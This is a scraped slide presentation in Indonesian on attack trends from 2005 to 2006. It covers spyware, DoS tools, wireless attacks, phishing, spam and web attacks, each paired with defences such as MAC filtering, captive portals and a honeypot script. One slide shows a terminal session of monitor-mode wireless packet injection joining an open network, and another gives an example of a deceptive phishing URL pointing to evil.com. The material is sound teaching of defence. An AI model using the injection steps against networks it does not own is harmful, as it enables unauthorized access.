Upload presentasi
Presentasi sedang didownload. Silahkan tunggu
1
Attack Trends 2005-2006 Presented by: Dani Firman Syah
2
Attack Trends Spyware DoS (Denial of Service) Attacks Wirelless Attacks Phishing (pronounced “fishing”) Spam Web Attacks
3
A. Spyware Spyware = aplikasi liar, terinstall secara diam-diam dan aktifitasnya adalah mempromosikan informasi tentang produk/barang melalui banner dan melakukan aktifitas tracking. Sypware Activity: - Memonitor aktifitas browsing & mem-popup banner. - Merekam aktifitas keyboard kadang menjadi email logger. Impact: - Performance - Privacy - Security Risk
4
Spyware Defense Cek apakah aplikasi yang di install bukan termasuk spyware. Daftar spyware bisa di lihat di http://www.surasoft.com/spywaredb/ Jangan meng-install aplikasi yang tidak jelas sumbernya. Gunakan software anti-spyware. Misal: Ad-aware. RTFM (Read The Faqs & Manual), baca baik-baik dokumen EULA (End User License Agreement) dari aplikasi yang akan di install. Gunakan firewall untuk mendeteksi koneksi keluar yang tidak di ketahui sumbernya.
5
B. DoS & DDoS DoS (Denial of Service) DDoS (Distributed Denial of Service) DoS = Serangan paket data melalui layanan TCP/IP (victim: network, host, aplikasi, system). DDoS = DDoS merupakan jenis serangan DoS secara massal dengan menggunakan hosts yang berbeda-beda untuk menyerang ke satu target/victim.
6
DoS & DDoS Tools TFN (Tribal Flood Network) Trin00 TFN2K (TFN with encrpytion, making it harder to detect. Tagra3 is new type of DoS attack) Stacheldraht (Combine Trin00 & TFN’s Technology)
7
TCP-IP Three Way Handshake SYN with ISN A COMPUTER A COMPUTER B ACK ISN A with SYN ISN B ACK ISN B Connection establish (ACK, Data)
8
Spoofing & DoS Computer A Computer B Attacker SYN (A, ISN A ) ACK (A, ISN A SYN (B, ISN B ) RESET!! !
9
SYN Flood/Smurf Attack (Spoofing Act) Computer AComputer B Attacker SYN (A, ISN A ) ACK (A, ISN A SYN (B, ISN B ) ACK (B, ISN B ) DIE!!! (SYN FLOOD)
10
TCP-IP Injection
12
DoS & DDoS Mitigation Cara paling sederhana adalah merubah IP (Internet Protocol) yang menjadi target DoS/DDoS. Hapus routing di gateway/router dari IP yang menjadi target. Filter signature attack dengan firewall untuk men-denied paket data yang tidak normal (zero data size, large UDP & ICMP packets). Firewall: iptables, packetfilter, ipfw, checkpoint and Cisco PIX support to deny unsignature packet data. Allow only first UDP & ICMP packets, after first igonered (i.e. timeout).
13
C. Wirelless Attack Various of Wirelless Attack : a. Surveillance attack (war driving or net stumbling) b. Rogue Access Point attack c. Jamming (Denial of Service) attack d. Cracking WEP (IV Collisions, FMS, Korek Chopchop) e. WPA Dictionary attack f. Wireless Injection attack
14
Wireless Attack Tools Netstumbler (Windows GUI) Wellenreiter (Linux GUI) Airsnort Kismet Aircrack WEPcrack AiroPeek CoPatty, etc
15
Surveillance Attack
16
War Driving
17
Rogue Access Point
18
Jamming (Denial of Service) Direct Sequence Spread Spectrum (DSSS) Channel Overlap Channel 1, 6, 11 not Overlapping
19
WEP Cracking
20
WPA Dictionary Attack (1)
21
WPA Dictionary Attack (2)
22
WPA Dictionary Attack (3)
23
WPA Dictionary Attack (4)
24
Wireless Injection root@wifisecurity:~# iwlist ath0 scan ath1 Scan completed : Cell 01 - Address: 00:13:10:30:32:4B ESSID:"linksys" Mode:Master Encryption key:off Frequency:2.452 GHz (Channel 9) Quality:43/0 Signal level:-28 dBm Noise level:-41 dBm root@wifisecurity:~# iwconfig ath1 mode monitor channel 9 root@wifisecurity:~# ifconfig ath1 promisc root@wifisecurity:~# wifiinject -b 00:13:10:30:32:4B -i ath1 -p -o ath1 IN_IFACE: ath1 OUT_IFACE: ath1 BSSID: 00:13:10:30:32:4B tcpdump: WARNING: ath1: no IPv4 address assigned Interface wj0 created. Configure it and use it root@wifisecurity:~# ifconfig wj0 192.168.2.110 mtu 1400 root@wifisecurity:~# ping 192.168.2.100 PING 192.168.2.100 (192.168.2.100): 56 data bytes 64 bytes from 192.168.2.100: icmp_seq=2 ttl=64 time=0.188 ms 64 bytes from 192.168.2.100: icmp_seq=3 ttl=64 time=0.206 ms.......
25
Securing The Wireless Network a) Secure SSID, MAC Filtering, WEP/WPA b) Wireless gateway for wireless protection (Captive Portal: noCat Auth, wifidog, hostapd + freeradius) c) VPN for securing the wireless network d) Monitoring: Fake AP, Wireless Honeypot, Arpwatch
26
Securing SSID Ganti SSID (Service Set Identifier) default dengan SSID yang tidak mudah di lacak (kombinasi huruf & angka), gunakan maksimum karakter untuk SSID.
27
MAC Filtering Konfigurasi MAC Address (Media Access Control) filtering di AP (Access Point). Hanya wireless dari client yang MAC-nya terdaftar yang bisa terkoneksi ke AP. MAC terdiri dari 24 bit, 12 bit pertama adalah code vendor, 12 bit selanjutnya serial number. Contoh: 00-10-4b vendor 3Com
28
WEP Security Proteksi dengan WEP (Wired Equivalent Privacy). WEP key = 64 bit, 128 bit
29
Wireless Gateway (1)
30
Wireless Gateway (2) NoCat Auth HOSTAP D + Open Source Captive Portal http://hostap.epitest.fi/hostap d http://freeradius.or g CHILLISPO T
31
Captive Portal
32
Securing the WLAN with VPN
33
Monitoring the WLAN Fake AP (Fake access point generator) Wireless Honeypot WIDS (The Wireless Intrusion Detection System) ARPWatch
34
Fake AP Black Alchemy Weapons Lab (http://www.blackalchemy.to/project/fakeap/ As part of honeypot Fake AP runs on Linux and *BSD Using Prism2/2.5/3 based 802.11b cards with Host AP for Intersil Prism2/2.5/3
35
Wireless Honeypot (1) HONEYPOT CONFIGURATION : FOR LINKSYS WRT54 ACCESS POINT create linksys set linksys personality " Linux Kernel 2.4.0 - 2.5.20" add linksys tcp port 80 "/bin/sh scripts/fakelinksys.sh" add linksys udp open 53 open add linksys udp open 67 open add linksys udp open 69 open set linksys tcp action reset bind 192.168.1.1 linksys
36
Wireless Honeypot (2) FILE: fakelinksys.sh #!/bin/sh DATE=`date` echo "== Httpd break-in attempt [$DATE] ==" >> /tmp/linksys.log while read request do LINE=`echo "$request" | egrep -i "[a-z:]"` if [ -z "$LINE" ] then break fi echo "$request" >> /tmp/linksys.log done echo "==" >> /tmp/linksys.log cat << _eof_ HTTP/1.0 401 Unauthorized Server: httpd Date: $DATE WWW-Authenticate: Basic realm="WRT54G" Content-Type: text/html Connection: close 401 Unauthorized Authorization required. _eof_
![Wireless Honeypot (2) FILE: fakelinksys.sh #!/bin/sh DATE=`date` echo == Httpd break-in attempt [$DATE] == >> /tmp/linksys.log while read request do LINE=`echo $request | egrep -i [a-z:] ` if [ -z $LINE ] then break fi echo $request >> /tmp/linksys.log done echo == >> /tmp/linksys.log cat << _eof_ HTTP/ Unauthorized Server: httpd Date: $DATE WWW-Authenticate: Basic realm= WRT54G Content-Type: text/html Connection: close 401 Unauthorized Authorization required.](http://images.slideplayer.info/42/11393303/slides/slide_36.jpg "_eof_.")
37
ARP Watch
38
D. Phishing Phising = Fishing, Victim di arahkan ke sebuah alamat URL dari web site palsu/fake web site yang seolah-olah situs tersebut asli. Phising di kirimkan melalui email palsu (fake/spoofed email). Site palsu tersebut biasanya mengandung virus, trojan atau informasi yang merugikan. Phising sering mengelabui victim dengan bug di browser, di kenal dengan istilah misleading di URL & HTML Links (bug di IE browser) Contoh: http://www.friendly.com%01@www.evil.com/friendly/index.html (misleading URL). www.friendly.com (misleading HTML)
39
Phising Example
45
Phising Defense Upgrade, patch dan fixed IE browser Anda dengan hotfix terbaru dari Microsoft Windows Update. (http://windowsupdate.microsoft.com) Gunakan non IE-Browser: Opera, Mozilla, Firefox, Conqueror Camino (mac). Disable email dengan mode HTML, gunakan plaintext email.
46
E. SPAM SPAM merupakan email yang biasanya berisi informasi iklan, produk, layanan dan informasi lainnya yang tidak di inginkan oleh pemilik email. SPAM menyebar dengan memanfaatkan informasi address book yang ada di internet (webpages, whitepages, yellowpages, search-engine dsb). SPAM seringkali menjadi sumber penyebaran virus di Internet. SPAM yang tidak terkontrol bisa meningkatkan traffic network yang dapat mengakibatkan bottleneck di jaringan.
47
Blocking SPAM Install Anti Spam email (SpamAssassin, Bogofilter, Razor, Pyzor, GFI MailEssentials dsb). Gunakan anti virus untuk email server (Mcafee, Symantec AV, Amavis, Mimedefang, Khasperky AV, NormanAV?). Jalankan fasilitas email blacklist/blocklist (i.e: exchange blocklist, spfilter). Beberapa provider blacklist bisa di gunakan untuk blocking spam. - relays.ordb.org - relays.visi.com - bl.spamcop.net - blackholes.wirehub.net - list.dsbl.org Gunakan frontend-backend topology (menggunakan 2 MTA/lebih, frontend server sebagai filtering machine).
48
F. Web Attacks Parameter Manipulation (CGI command execution, Unicode/URL Decoding) Buffer Overflow (.ida/.idq Overflow, ISAPI Printer Overflow, WebDAV Overflow / Web-based Distributing & Authoring Versioning). Cross Site Scripting (XSS) SQL Injection Session/Cookie Hijacking & Manipulation © Dani Firman Syah, Xnuxer Security, Email: xnuxer@yahoo.com
49
Parameter Manipulation
50
SQL Injections
51
Cross Site Scripting
52
Securing The Web Gunakan secure WebServer Install patch dan hotfix terbaru. Install IIS Lockdown di IIS Webserver. Securing code (filter variable). Gunakan filtering device (Denied illegal signature TCP-IP). Gunakan SSL (Secure Socket Layer) untuk transaksi data yang aman.
53
Questions?
Presentasi serupa
